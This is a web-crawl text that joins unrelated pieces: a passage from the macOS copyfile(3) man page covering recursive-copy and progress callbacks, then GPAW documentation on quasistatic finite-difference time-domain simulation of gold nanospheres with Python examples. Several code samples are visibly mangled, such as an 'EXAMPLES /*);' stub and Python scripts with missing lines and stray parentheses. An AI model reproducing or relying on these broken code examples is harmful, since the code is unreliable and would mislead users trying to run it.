callbacks.) The dst parameter is a pointer to off_t (type off_t * ). COPYFILE_STATE_XATTRNAME Get the name of the extended attribute dur- ing a callback for COPYFILE_COPY_XATTR (see below for details). This field cannot be set, and may be NULL. Recursive Copies When given the COPYFILE_RECURSIVE flag, copyfile() (but not fcopyfile()) will use the fts(3) functions to recursively descend into the source file-system object. It then calls copyfile() on each of the entries it finds that way. If a call-back function is given (using copyfile_state_set() and COPYFILE_STATE_STATUS_CB ), the call-back func- tion.) The call-back function will have one of the following values as the first argument, indicating what is being copied: COPYFILE_RECURSE_FILE The object being copied is a file (or, rather, something other than a directory). COPYFILE_RECURSE_DIR The object being copied is a directory, and is being entered. (That is, none of the filesystem objects contained within the directory have been copied yet.) COPYFILE_RECURSE_DIR_CLEANUP The object being copied is a directory, and all of the objects contained have been copied. 
At this stage, the destination directory being copied will have any extra permissions that were added to allow the copying will be removed. COPYFILE_RECURSE_ERROR There was an error in processing an element of the source hierarchy; this happens when fts(3) returns an error or unknown file type. (Currently, the second argument to the call-back function will always be COPYFILE_ERR in this case.) The second argument to the call-back function will indicate the stage of the copy, and will be one of the following values: COPYFILE_START Before copying has begun. The third parameter will be a newly-created copyfile_state_t object with the call-back function and context pre-loaded. COPYFILE_FINISH After copying has successfully finished. COPYFILE_ERR Indicates an error has happened at some stage. If the first argument to the call-back function is COPYFILE_RECURSE_ERROR, then an error occurred while processing the source hierarchy; otherwise, it will indicate what type of object was being copied, and errno will be set to indicate the error. The fourth and fifth parameters are the source and destination paths that are to be copied (or have been copied, or failed to copy, depending on the second argument). The last argument to the call-back function will be the value set by COPYFILE_STATE_STATUS_CTX, if any. The call-back function is required to return one of the following values: COPYFILE_CONTINUE The copy will continue as expected. COPYFILE_SKIP This object will be skipped, and the next object will be processed. (Note that, when entering a directory. returning COPYFILE_SKIP from the call-back function will prevent the contents of the directory from being copied.) COPYFILE_QUIT The entire copy is aborted at this stage. Any filesystem objects created up to this point will remain. copyfile() will return -1, but errno will be unmodified. The call-back function must always return one of the values listed above; if not, the results are undefined. The call-back function will be called twice for each object (and an addi- tional two times for directory cleanup); the first call will have a stage parameter of COPYFILE_START; the second time, that value will be either COPYFILE_FINISH or COPYFILE_ERR to indicate a successful completion, or an error during processing. In the event of an error, the errno value will be set appropriately. The COPYFILE_PACK, COPYFILE_UNPACK, COPYFILE_MOVE, and COPYFILE_UNLINK flags are not used during a recursive copy, and will result in an error being returned. Progress Callback In addition to the recursive callbacks described above, copyfile() and fcopyfile() will also use a callback to report data (e.g., COPYFILE_DATA) progress. If given, the callback will be invoked on each write(2) call. The first argument to the callback function will be COPYFILE_COPY_DATA. The second argument will either be COPYFILE_PROGRESS (indicating that the write was successful), or COPYFILE_ERR (indicating that there was an error of some sort). The amount of data bytes copied so far can be retrieved using copyfile_state_get(), with the COPYFILE_STATE_COPIED requestor (the argu- ment type is a pointer to off_t ). When copying extended attributes, the first argument to the callback function will be COPYFILE_COPY_XATTR. The other arguments will be as described for COPYFILE_COPY_DATA; the name of the extended attribute being copied may be retrieved using copyfile_state_get() and the parame- ter COPYFILE_STATE_XATTRNAME. 
When using COPYFILE_PACK, the callback may be called with COPYFILE_START for each of the extended attributes first, followed by COPYFILE_PROGRESS before getting and packing the data for each individual attribute, and then COPYFILE_FINISH when finished with each individual attribute. (That is, COPYFILE_START may be called for all of the extended attributes, before the first callback with COPYFILE_PROGRESS is invoked.) Any attribute skipped by returning COPYFILE_SKIP from the COPYFILE_START callback will not be placed into the packed output file. The return value for the data callback must be one of COPYFILE_CONTINUE The copy will continue as expected. (In the case of error, it will attempt to write the data again.) COPYFILE_SKIP The data copy will be aborted, but without error. COPYFILE_QUIT The data copy will be aborted; in the case of COPYFILE_PROGRESS, errno will be set to ECANCELED. While the src and dst parameters will be passed in, they may be NULL in the case of fcopyfile(). RETURN VALUES Except when given the COPYFILE_CHECK flag, copyfile() and fcopyfile() return less than 0 on error, and 0 on success. All of the other func- tions return 0 on success, and less than 0 on error. WARNING Both copyfile() and fcopyfile() can copy symbolic links; there is a gap between when the source link is examined and the actual copy is started, and this can be a potential security risk, especially if the process has elevated privileges. When performing a recursive copy, if the source hierarchy changes while the copy is occurring, the results are undefined. fcopyfile() does not reset the seek position for either source or desti- nation. This can result in the destination file being a different size than the source file. ERRORS copyfile() and fcopyfile() will fail if: [EINVAL] An invalid flag was passed in with COPYFILE_RECURSIVE. [EINVAL] The from or to parameter to copyfile() was a NULL pointer. [EINVAL] The from or to parameter to copyfile() was a negative number. [ENOMEM] A memory allocation failed. [ENOTSUP] The source file was not a directory, symbolic link, or regular file. [ECANCELED] The copy was cancelled by callback. In addition, both functions may set errno via an underlying library or system call. EXAMPLES /*); SEE ALSO listxattr(2), getxattr(2), setxattr(2), acl(3) BUGS Both copyfile() functions lack a way to set the input or output block size. Recursive copies do not honor hard links. HISTORY The copyfile() API was introduced in Mac OS X 10.5. BSD April 27, 2006 BSD Mac OS X 10.8 - Generated Mon Aug 27 16:33:41 CDT 2012
http://www.manpagez.com/man/3/copyfile/
CC-MAIN-2020-05
en
refinedweb
Quasistatic Finite-Difference Time-Domain method¶ The optical properties of all materials depend on how they respond (absorb and scatter) to external electromagnetic fields. In classical electrodynamics, this response is described by the Maxwell equations. One widely used method for solving them numerically is the finite-difference time-domain (FDTD) approach. 1. It is based on propagating the electric and magnetic fields in time under the influence of an external perturbation (light) in such a way that the observables are expressed in real space grid points. The optical constants are obtained by analyzing the resulting far-field pattern. In the microscopic limit of classical electrodynamics the quasistatic approximation is valid and an alternative set of time-dependent equations for the polarization charge, polarization current, and the electric field can be derived.2 The quasistatic formulation of FDTD is implemented in GPAW. It can be used to model the optical properties of metallic nanostructures (i) purely classically, or (ii) in combination with Time-propagation TDDFT, which yields Hybrid Quantum/Classical Scheme. Quasistatic approximation¶ The quasistatic approximation of classical electrodynamics means that the retardation effects due to the finite speed of light are neglected. It is valid at very small length scales, typically below ~50 nm. Compared to full FDTD, quasistatic formulation has some advantageous features. The magnetic field is negligible and only the longitudinal electric field need to be considered, so the number of degrees of freedom is smaller. Because the retardation effects and propagating solutions are excluded, longer time steps and a simpler treatment of the boundary conditions can be used. Permittivity¶ In the current implementation, the permittivity of the classical material is parametrized as a linear combination of Lorentzian oscillators where \(\alpha_j, \beta_j, \bar{\omega}_j\) are fitted to reproduce the experimental permittivity. For gold and silver they can be found in Ref. 2. Permittivity defines how classical charge density polarizes when it is subject to external electric fields. The time-evolution for the charges in GPAW is performed with the leap-frog algorithm, following Ref. 3. To test the quality of the fit, one can use this script. This gives a following plot for Au permittivity fitting. Geometry components¶ Several routines are available to generate the basic shapes: \(\text{PolarizableBox}(\mathbf{r}_1, \mathbf{r}_2, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{r}_1\) and \(\mathbf{r}_2\) are the corner points, and \(\epsilon({\mathbf{r}, \omega})\) is the permittivity inside the structure \(\text{PolarizableSphere}(\mathbf{p}, r, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{p}\) is the center and \(r\) is the radius of the sphere \(\text{PolarizableEllipsoid}(\mathbf{p}, \mathbf{r}, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{p}\) is the center and \(\mathbf{r}\) is the array containing the three radii \(\text{PolarizableRod}(\mathbf{p}, r, \epsilon({\mathbf{r}, \omega}), c)\) where \(\mathbf{p}\) is an array of subsequent corner coordinates, \(r\) is the radius, and \(c\) is a boolean denoting whether the corners are rounded \(\text{PolarizableTetrahedron}(\mathbf{p}, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{p}\) is an array containing the four corner points of the tetrahedron These routines can generate many typical geometries, and for general cases a set of tetrahedra can be used. 
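As a sketch of how these shape routines are combined into a scattering geometry (the argument order follows the signatures listed above, while the add_component call and the pre-fitted permittivity object eps are assumptions based on the nanosphere example below):

from gpaw.fdtd.polarizable_material import (PolarizableMaterial,
                                            PolarizableSphere,
                                            PolarizableEllipsoid)

# eps is a PermittivityPlus object fitted to the metal of interest,
# constructed as in the gold-nanosphere example below.
material = PolarizableMaterial()
# a 5 nm radius sphere (lengths in Angstrom, as usual in ASE/GPAW)
material.add_component(PolarizableSphere([75.0, 75.0, 75.0], 50.0, eps))
# an ellipsoid with radii of 4 nm, 2 nm and 2 nm
material.add_component(PolarizableEllipsoid([200.0, 75.0, 75.0],
                                            [40.0, 20.0, 20.0], eps))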
Optical response¶ The QSFDTD method can be used to calculate the optical photoabsorption spectrum just like in Time-propagation TDDFT: The classical charge density is first perturbed with an instantaneous electric field, and then the time dependence of the induced dipole moment is recorderd. Its Fourier transformation gives the photoabsorption spectrum. Example: photoabsorption of gold nanosphere¶ This example calculates the photoabsorption spectrum of a nanosphere that has a diameter of 10 nm, and compares the result with analytical Mie scattering limit. from gpaw.fdtd.poisson_fdtd import QSFDTD from gpaw.fdtd.polarizable_material import (PermittivityPlus, PolarizableMaterial, PolarizableSphere) from gpaw.tddft import photoabsorption_spectrum))) # Quasistatic FDTD qsfdtd = QSFDTD(classical_material=classical_material, atoms=None, cells=large_cell, spacings=[8.0, 1.0], communicator=world, remove_moments=(4, 1)) # Run ground state energy = qsfdtd.ground_state('gs.gpw', nbands=-1) # Run time evolution qsfdtd.time_propagation('gs.gpw', time_step=10, iterations=1000, kick_strength=[0.001, 0.000, 0.000], dipole_moment_file='dm.dat') # Spectrum photoabsorption_spectrum('dm.dat', 'spec.dat', width=0.0) Here the QSFDTD object generates a dummy quantum system that is treated using GPAW in qsfdtd.ground_state. One can pass the GPAW arguments, like xc or nbands, to this function: in the example script one empty KS-orbital was included (nbands =1) because GPAW needs to propagate something. Similarly, the arguments for TDDFT (such as propagator) can be passed to time_propagation method. Note that the permittivity was initialized as PermittivityPlus, where Plus indicates that a renormalizing Lorentzian term is included; this extra term brings the static limit to vacuum value, i.e., \(\epsilon(\omega=0)=\epsilon_0\), see Ref. 4 for detailed explanation. The above script generates the photoabsorption spectrum and compares it with analytical formula of the Mie theory: where V is the nanosphere volume: The general shape of Mie spectrum, and especially the localized surface plasmon resonance (LSPR) at 2.5 eV, is clearly reproduced by QSFDTD. The shoulder at 1.9 eV and the stronger overall intensity are examples of the inaccuracies of the used discretization scheme: the shoulder originates from spurious surface scattering, and the intensity from the larger volume of the nanosphere defined in the grid. For a better estimate of the effective volume, you can take a look at the standard output where the “Fill ratio” tells that 18.035% of the grid points locate inside the sphere. This means that the volume (and intensity) is roughly 16% too large: \(\frac{V}{V_{\text{sphere}}}\approx\frac{0.18035\times(15\text{nm})^3)}{\frac{4}{3}\pi\times(5\text{nm})^3}\approx1.16\). Advanced example: Near field enhancement¶ This example shows how to calculate the induced electric near field enhancement of the same nanosphere considered in the previous example. The induced field calculations can be included by using the advanced syntax instead of the simple QSFDTD wrapper. In the example one can also see how the dummy empty quantum system is generated. 
from ase import Atoms from gpaw import GPAW from gpaw.fdtd.poisson_fdtd import FDTDPoissonSolver from gpaw.fdtd.polarizable_material import (PermittivityPlus, PolarizableMaterial, PolarizableSphere) from gpaw.tddft import TDDFT, photoabsorption_spectrum from gpaw.inducedfield.inducedfield_fdtd import FDTDInducedField))) # Poisson solver poissonsolver = FDTDPoissonSolver(classical_material=classical_material, cl_spacing=8.0, qm_spacing=1.0, cell=large_cell, communicator=world, remove_moments=(4, 1)) poissonsolver.set_calculation_mode('iterate') # Dummy quantum system atoms = Atoms('H', [0.5 * large_cell], cell=large_cell) atoms, qm_spacing, gpts = poissonsolver.cut_cell(atoms) del atoms[:] # Remove atoms, quantum system is empty # Initialize GPAW gs_calc = GPAW(gpts=gpts, nbands=-1, poissonsolver=poissonsolver) atoms.set_calculator(gs_calc) # Ground state energy = atoms.get_potential_energy() # Save state gs_calc.write('gs.gpw', 'all') # Initialize TDDFT and FDTD kick = [0.001, 0.000, 0.000] time_step = 10 iterations = 1000 td_calc = TDDFT('gs.gpw') td_calc.absorption_kick(kick_strength=kick) td_calc.hamiltonian.poisson.set_kick(kick) # Attach InducedField to the calculation frequencies = [2.45] width = 0.0 ind = FDTDInducedField(paw=td_calc, frequencies=frequencies, width=width) # Propagate TDDFT and FDTD td_calc.propagate(time_step, iterations, 'dm0.dat', 'td.gpw') # Save results td_calc.write('td.gpw', 'all') ind.write('td.ind') # Spectrum photoabsorption_spectrum('dm0.dat', 'spec.dat', width=width) # Induced field ind.calculate_induced_field(gridrefinement=2) ind.write('field.ind', mode='all') The contents of the obtained file field.ind can be visualized like described in Advanced example: Near field enhancement of hybrid system. We obtain a following plot of the field: Note that the oscillations in the induced field (and density) inside the material are caused by numerical limitations of the current implementation. Limitations¶ The scattering from the spurious surfaces of materials, which are present because of the representation of the polarizable material in uniformly spaced grid points, can cause unphysical broadening of the spectrum. Nonlinear response (hyperpolarizability) of the classical material is not supported, so do not use too large external fields. In addition to nonlinear media, also other special cases (nonlocal permittivity, natural birefringence, dichroism, etc.) are not enabled. The frequency-dependent permittivity of the classical material must be represented as a linear combination of Lorentzian oscillators. Other forms, such as Drude terms, should be implemented in the future. Also, the high-frequency limit must be vacuum permittivity. Future implementations should get rid of also this limitation. Only the grid-mode of GPAW (not e.g. LCAO) is supported. Technical remarks¶ Double grid technique: the calculation always uses two grids: one for the classical part and one for the TDDFT part. In purely classical simulations, suchs as the ones discussed in this page, the quantum subsystem contains one empty Kohn-Sham orbital. For more information, see the description of Hybrid Quantum/Classical Scheme because there the double grid is very important. Parallelizatility: QSFDTD calculations can by parallelized only over domains, so use either communicator=serial_comm or communicator=world when initializing QSFDTD (or FDTDPoissonSolver) class. The domain parallelization of QSFDTD does not affect the parallelization of DFT calculation. 
Multipole corrections to Poissonsolver: QSFDTD module is mainly intended for nanoplasmonic simulations. There the charge oscillations are strong and the usual zero boundary conditions for the electrostatic potential can give inaccurate results if the simulation box is not large enough. In some cases, such as for single nanospheres, one can improve the situation by defining remove_moments argument in FDTDPoissonSolver: this will then use the multipole moments correction scheme, see e.g. Ref. 5. TODO¶ Dielectrics (\(\epsilon_{\infty}\neq\epsilon_0\)) Geometries from 3D model files Subcell averaging Full FDTD (retardation effects) or interface to an external FDTD software Fix grid-dependent oscillations in the induced density Combination with TDDFT¶ The QSFDTD module is mainly aimed to be used in combination with Time-propagation TDDFT: see Hybrid Quantum/Classical Scheme for more information. References¶ - 1 A. Taflove and S. Hagness, Computational Electrodynamics: The Finite-Difference Time-Domain Method (3rd ed.), Artech House, Norwood, MA (2005). - 2(1,2) A. Coomar, C. Arntsen, K. A. Lopata, S. Pistinner and D. Neuhauser, Near-field: a finite-difference time-dependent method for simulation of electrodynamics on small scales, J. Chem. Phys. 135, 084121 (2011) - 3 Y. Gao and D. Neuhauser, Dynamical quantum-electrodynamics embedding: Combining time-dependent density functional theory and the near-field method J. Chem. Phys. 137, 074113 (2012) - 4 A. Sakko, T. P. Rossi and R. M. Nieminen, Dynamical coupling of plasmons and molecular excitations by hybrid quantum/classical calculations: time-domain approach J. Phys.: Condens. Matter 26, 315013 (2014) - 5 A. Castro, A. Rubio, and M. J. Stott Solution of Poisson’s equation for finite systems using plane wave methods Canad. J. Phys.: 81, 1151 (2003)
https://wiki.fysik.dtu.dk/gpaw/documentation/electrodynamics/qsfdtd.html
CC-MAIN-2020-05
en
refinedweb
The title article is causing a brouhaha about MS licensing practices. Given my reading of the license, I'm wondering if it really means what people are interpreting it to mean. Looking forward to the MS correction, which is likely to come sometime this week.;-) You might want to see what VNC is. It's a very useful tool to know about. Also, there's rdesktop for various UNIX flavors that allow connection to RDP servers, including the one in XP Pro. In fact, I'm using it to post this message. (Interesting Google tidbit... a while back I searched for "terminal services client linux" looking for what rdesktop is, but I had the hardest time finding it. iRights is no Yahoo.com, but Google does appreciate it, so I gave it a link, hoping to boost the rating so it would come up sooner. It seems I was successful, rdesktop.org is now the top hit for that search string. Look at the reverse links; only one higher. Another Google success.) I've definately decided to go with the Jabber stuff I described earlier. A few more advantages: Threading issues are simpler. If the users are responsible for re-establishing connections, there's a nasty time while the system is logging in, but the server will reject any other messages, like I said. If I take control of the re-establishment, it's easy to block these messages. There are also a few misc. places where I could construct a multi-threaded scenario where something bad happened; this reduces, and I think eliminates, those. (I need to double-check the elimination claim, but even if it's false, the consequences of being incorrect are not that critical.) Production quality. The .7 release is suitable for playing, but because disconnections are such violent events, it's not suitable for production use. .8 will be the beginning of production quality, at least in theory. ;-) As for anyone who may be playing with the framework and wonders if their code will be useless later, the answer is no. In fact, you'll find you'll need to make very few changes .7->.8; it will mostly be removing calls to "openConnection", and the connectionReference parameters. Feel free to play, and let me know what you find. The last issue I thought about is the callback approach versus a registerHandler function, as I currently use. Radio uses a callback system throughout, where you drop your script/address-to-script into some table, and everything works. I can't *quite* do that for Jabber, as scripts need to give a little more information about what they want to do. For instance, for an iq tag catcher, I need to know what namespace you're interested in, which I'll store in a table by that name. However, if you know in advance where your script will go, if you put it there manually, everything will work, so in the final analysis, the registerHandler function is just a convenience. I think I can get .8 out this week. Coding is fairly easy, but there's a lot of testing ground to cover; every capability of the system must be re-tested. I just filed my taxes. It took me and my wife half-an-hour, included no redundent steps, and was not at all stressful. (Except at one point where we had to go look up the meaning of "homestead".) The return was zapped off to Michigan and the IRS automatically, and the refunds will be direct deposited to our bank account. I didn't even go to the store to buy the tax software! I did it online with Turbo Tax for the Web, and I even did it all for free because I qualified for the Quicken Tax Freedom Project version. 
Compare this with ten years ago, and tell me technology is useless. It may not produce nirvana, but it just saved me several hours. (Interesting history of the federal income tax.) A.) 'Six months to the day after the Sept. 11 terrorist attacks, a Florida flight school where two of the suicide hijackers trained received letters from the Immigration and Naturalization Service indicating that the men had been approved for student visas.' And people wonder why I'm not willing to turn control of things like, say, what websites out children can and can't see, over to the government. Everybody's winging it...
http://www.jerf.org/iri/?page=120
CC-MAIN-2018-34
en
refinedweb
Language in C Interview Questions and Answers Ques 46. How do I print a floating-point number with higher precision say 23.34568734 with only precision up to two decimal places? Ans. This can be achieved through the use of suppression char '*' in the format string of printf( ) as shown in the following program. main( ) { int i = 2 ; float f = 23.34568734 ; printf ( "%.*f", i, f ) ; } The output of the above program would be 23.35. Is it helpful? Add Comment View Comments Ques 47. Are the expressions *ptr++ and ++*ptr same? Ans. No. *ptr++ increments the pointer and not the value pointed by it, whereas ++*ptr increments the value being pointed to by ptr. Is it helpful? Add Comment View Comments Ques 48. strpbrk( ) Ans. The function strpbrk( ) takes two strings as parameters. It scans the first string, to find, the first occurrence of any character appearing in the second string. The function returns a pointer to the first occurrence of the character it found in the first string. The following program demonstrates the use of string function strpbrk( ). #include <string.h> main( ) { char *str1 = "Hello!" ; char *str2 = "Better" ; char *p ; p = strpbrk ( str1, str2 ) ; if ( p ) printf ( "The first character found in str1 is %c", *p ) ; else printf ( "The character not found" ) ; } The output of the above program would be the first character found in str1 is e div( )... The function div( ) divides two integers and returns the quotient and remainder. This function takes two integer values as arguments; divides first integer with the second one and returns the answer of division of type div_t. The data type div_t is a structure that contains two long ints, namely quot and rem, which store quotient and remainder of division respectively. The following example shows the use of div( ) function. #include <stdlib.h> void main( ) { div_t res ; res = div ( 32, 5 ) ; printf ( "\nThe quotient = %d and remainder = %d ", res.quot, res.rem ) ; Is it helpful? Add Comment View Comments Ques 49. Can we convert an unsigned long integer value to a string? Ans. The function ultoa( ) can be used to convert an unsigned long integer value to a string. This function takes three arguments, first the value that is to be converted, second the base address of the buffer in which the converted number has to be stored (with a string terminating null character '\0') and the last argument specifies the base to be used in converting the value. Following example demonstrates the use of this function. #include <stdlib.h> void main( ) { unsigned long ul = 3234567231L ; char str[25] ; ultoa ( ul, str, 10 ) ; printf ( "str = %s unsigned long = %lu\n", str, ul ) ; } Is it helpful? Add Comment View Comments Ques 50. ceil( ) and floor( ) Ans. The math function ceil( ) takes a double value as an argument. This function finds the smallest possible integer to which the given number can be rounded up. Similarly, floor( ) being a math function, takes a double value as an argument and returns the largest possible integer to which the given double value can be rounded down. The following program demonstrates the use of both the functions. 
#include <math.h>
void main( )
{
    double no = 1437.23167 ;
    double down, up ;
    down = floor ( no ) ;
    up = ceil ( no ) ;
    printf ( "The original number %7.5lf\n", no ) ;
    printf ( "The number rounded down %7.5lf\n", down ) ;
    printf ( "The number rounded up %7.5lf\n", up ) ;
}

The output of this program would be,
The original number 1437.23167
The number rounded down 1437.00000
The number rounded up 1438.00000
Is it helpful? Add Comment View Comments
Most helpful rated by users:
- What will be the output of the following code? void main () { int i = 0 , a[3] ; a[i] = i++; printf ("%d",a[i]) ; }
- Why doesn't the following code give the desired result? int x = 3000, y = 2000 ; long int z = x * y ;
- Why doesn't the following statement work? char str[ ] = "Hello" ; strcat ( str, '!' ) ;
- How do I know how many elements an array can hold?
- How do I compare character data stored at two different memory locations?
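Question 47 above contrasts *ptr++ and ++*ptr only in words; a short program makes the difference visible:

#include <stdio.h>

int main(void)
{
    int a[] = { 10, 20, 30 };
    int *p = a;

    printf("%d\n", *p++);   /* prints 10, then p moves on to a[1] */
    printf("%d\n", *p);     /* prints 20 */

    ++*p;                   /* increments the value a[1] from 20 to 21 */
    printf("%d\n", *p);     /* prints 21 */
    return 0;
}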
http://www.withoutbook.com/Technology.php?tech=11&page=10&subject=
CC-MAIN-2018-34
en
refinedweb
AWS services or capabilities described in AWS Documentation may vary by region/location. Click Getting Started with Amazon AWS to see specific differences applicable to the China (Beijing) Region. This is the response object from the CreateRepository operation. Namespace: Amazon.ECR.Model Assembly: AWSSDK.ECR.dll Version: 3.x.y.z The CreateRepositoryResponse type exposes the following members This example creates a repository called nginx-web-app inside the project-a namespace in the default registry for an account. var response = client.CreateRepository(new CreateRepositoryRequest { RepositoryName = "project-a/nginx-web-app" }); Repository repository = response.Repository;
https://docs.aws.amazon.com/sdkfornet/v3/apidocs/items/ECR/TCreateRepositoryResponse.html
CC-MAIN-2018-34
en
refinedweb
Computes geodesic lines from start point to end point and stores them in a GIS file (Shapefile and GeoJSON). The problem of geodesic lines crossing antimeridian is solved. Project description Computes geodesic lines from start point to end point and stores them in a GIS file (Shapefile and GeoJSON). A geodesic is the shortest path between two points on a curved surface, like an ellipsoid of revolution (Read more on Wikipedia). This code is builded on top of three libraries: Pyproj, Fiona and Shapely. There are several libraries to compute geodesic distances solving the geodesic inverse problem (to find the shortest path between two given points). I chose Pyproj because it works fine for this purpose and is an interface to a widely used library in the geospatial industry (Proj4 C library). Actually Proj4 C library (>= v.4.9.0) routines used to compute geodesic distance are a simple transcription from excellent Geographiclib C++ Library developed by Charles Karney. Proj4 C library < v.4.9.0 uses Paul D. Thomas algorithms. You can see more about this here: GeodeticMusings: a little benchmark of three Python libraries to compute geodesic distances. All computations are performed with WGS84 ellipsoid and the CRS (Coordinate Reference System) of GIS file outputs are EPSG:4326. In the examples section you can see the problem of calculating lines crossing antimeridian is solved. Numpy array is supported as inputa data. Geodesic lines examples Below are shown different geodesic lines computed with this library on several map projections. Also you can see the relation with rhumb lines (loxodromic) and straight lines between the same points: Requirements - Pyproj, - Fiona, - Shapely, Usage Usage is very simple. There are two modes: - Single input (one start/end). - Multiple input (more than one start/end). Single input Single input usage. from geodesiclinestogis import GeodesicLine2Gisfile lons_lats: input coordinates. (start longitude, start latitude, end longitude, end latitude) lons_lats = (-3.6,40.5,-118.4,33.9) Folder path to store output file and filename: folderpath = '/tmp' layername = "geodesicline" Create object. You can pass two parameters: - antimeridian: [True, False] to solve antimeridian problem (default is True). - prints: [True, False] print output messages (default is True). gtg = GeodesicLine2Gisfile() Launch computations. You can pass two parameter: - lons_lats: input coords returned by gcComp. - km_pts: compute one point each n km (default is 20 km) cd = gtg.gdlComp(lons_lats, km_pts=30) Dump geodetic line coords to Linestring Feature and store in a GIS file. Output formats: “ESRI Shapefile” (default), “GeoJSON” # shapefile output gtg.gdlToGisFile(cd, folderpath, layername) # geojson output gtg.gdlToGisFile(cd, folderpath, layername, fmt="GeoJSON") Multiple input Multiple input usage.) ] folderpath = "/tmp/geod_line" layername = "geodesicline" gtg = GeodesicLine2Gisfile() gtg.gdlToGisFileMulti(data, folderpath, layername) Numpy array (multiple) input Numpy array input usage. import numpy as np) ] data = np.array(data_) folderpath = "/tmp/geod_line_np" layername = "geodesicline" gtg = GeodesicLine2Gisfile() gtg.gdlToGisFileMulti(data, folderpath, layername) License This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. 
Third-Party licenses: the Pyproj, Fiona and Shapely licenses can be read at their respective project pages.
https://pypi.org/project/GeodesicLinesToGIS/
CC-MAIN-2018-34
en
refinedweb
Document-Centric .NET May 12, 2004 The principle "program to an interface, not an implementation" helps control the complexity and enhance the flexibility of systems. XML interfaces are a natural extension of this principle that bring a number of new benefits in terms of flexibility, reusability, simplified code, and readiness for enterprise environments. We will walk through a sample application to see how the .NET framework classes can work together in an application centered around an XML interface. This XML interface will be the hub of present and future requirements. Our application will produce a bar graph from a variety of data sources. Though this example is relatively trivial, similar approaches can solve larger and more complex problems. The Schema Our bar graph application will revolve around a schema written in the W3C XML Schema language. Specifying this schema will be one of the first and most important design steps. Stability is key and all the better if you can use a standardized schema for your application. However, keep in mind that there are W3C XML Schema features that are not directly compatible with .NET's XML-to-database and XML-to-object mapping tools. For this application we'll use a custom schema: BarGraph.xsd. An instance document conforming to this schema looks like the following: <BarGraph xmlns=""> <Bar> <Title>Portland</Title> <Value>32</Value> </Bar> <Bar> <Title>Berlin</Title> <Value>20</Value> </Bar> <Bar> <Title>Pune</Title> <Value>16</Value> </Bar> </BarGraph> Taming the Winds: Input into our Application We'll start by gathering input from a variety of sources. The following three examples will each produce the same result: an XmlReader containing bar graph XML. XmlReader is an abstract class that plays a similar role to other platforms' use of SAX, in that it can be used to pass the contents of a XML text file, a DOM tree, or a high-throughput dynamic data source. GetXml() #1: REST web service The most familiar benefit of XML interfaces is that they allow applications to span machine and platform boundaries. Techniques that are well described asREST can be an easy way to pull XML from a network resource. We will use the XmlTextReader subclass of XmlReader, which can be used to read data from files or remote REST URLs. public XmlReader GetXml() { string url = ""; XmlReader graphReader = new XmlTextReader(url); return graphReader; } GetXml() #2: Database Another data source might be a database. Microsoft has placed XML at the center of its ADO.NET data access library with the DataSet, which is simultaneously a disconnected set of relational data and a XML document. The first step to get the XML is to create a DataAdapter, which is a bridge between the database and the DataSet. Here we construct a SqlDataAdapter, a SQL Server specific DataAdapter, with a connection string and a SQL statement. public XmlReader GetXml() { string sql = "SELECT * FROM [Category Sales for 1997]"; string conn = "Data Source=(local);Database=Northwind;" + "Integrated Security=SSPI;"; SqlDataAdapter da = new SqlDataAdapter(sql,conn); Next we create a new empty DataSet and fill it with data using the DataAdapter's Fill method. DataSet ds = new DataSet(); da.Fill(ds); The default schema of the dataset does not match bar graph XML. We could use XSLT to transform it, but in some cases we can do this more efficiently by directly modifying the DataSet. 
ds.DataSetName = "BarGraph"; ds.Namespace = ""; ds.Tables[0].TableName="Bar"; ds.Tables[0].Columns[0].ColumnName="Title"; ds.Tables[0].Columns[1].ColumnName="Value"; There are a number of ways to obtain the DataSet's XML, including the WriteXml and GetXml methods. Here we will use the XmlDataDocument class to expose the DataSet as a DOM object, and then create an XmlNodeReader, which is a XmlReader that reads the contents of a DOM object. XmlDocument xmlDoc = new XmlDataDocument(ds); XmlReader graphReader = new XmlNodeReader(xmlDoc); return graphReader; } GetXml() #3: User Form The previous example showed how a DataSet object can be used as a bridge between a database and XML. The DataSet can also be used as a bridge between controls in a Windows form and XML. The complete source code for this example is at form2graph.zip. In our form's constructor, we'll create a DataSet and give it a structure by reading in our BarGraph schema using the ReadXmlSchema method. private DataSet ds; private DataGrid grid; public BarGraphForm() { InitializeComponent(); // Create a dataset based on the schema ds = new DataSet(); ds.ReadXmlSchema("BarGraph.xsd"); Then we'll bind the DataSet to a DataGrid control in our form. The DataGrid will automatically create columns that conform to the schema in the DataSet. // Bind the dataset to a DataGrid control grid.SetDataBinding(ds,"Bar"); } Now when the form is displayed, the DataGrid will conform to the schema, and the user can add and edit data. Once the user is finished, we will use the WriteXml method to extract the XML from the dataset. public XmlReader GetXml() { Stream streamXml = new MemoryStream(); ds.WriteXml(streamXml); streamXml.Position = 0; XmlReader graphReader = new XmlTextReader(streamXml); return graphReader; } Application Output Each of the following examples will perform some action using an XmlReader containing bar graph XML. Naturally the choice of our input source is unimportant, since all the sources produce XmlReaders conforming to the same schema. OutputAction() #1: An SVG Image Another familiar benefit of XML interfaces is that an SVG or XHTML presentation is often only a transformation away. To perform the XSLT transform we load our XmlReader into a XPathDocument, public void OutputAction(XmlReader graphReader) { XPathDocument graphDoc = new XPathDocument(graphReader); set up the XslTransform object, XslTransform xslt = new XslTransform(); xslt.Load("svgGraph.xsl"); and write the output to a file. I am using the older .NET 1.0 syntax; In .NET 1.1's the Transform method has changed slightly. Stream outStream = new FileStream("graph.svg",FileMode.Create); xslt.Transform(graphDoc, null, outStream); outStream.Close(); } OutputAction() #2: A PNG Bitmap If some sort of human analysis is required, it's more appropriate to work with a graph than XML. This is how we'll convert our bar graph XML into a PNG image file. The complete source code for this example is in graph2png.zip. The OutputAction method will simply call the static XmlToPng method with the XmlReader. This will write the image onto an output stream. public void OutputAction(XmlReader graphReader) { Stream outStream = new FileStream("graph.png",FileMode.Create); BarGraphImage.XmlToPng(graphReader,outStream); outStream.Close(); } The static XmlToPng method creates the image by deserializing the XML into an object graph. We'll use the XmlSerializer class to create an instance of the custom BarGraphImage class and then call its WriteImage method to create the PNG image. 
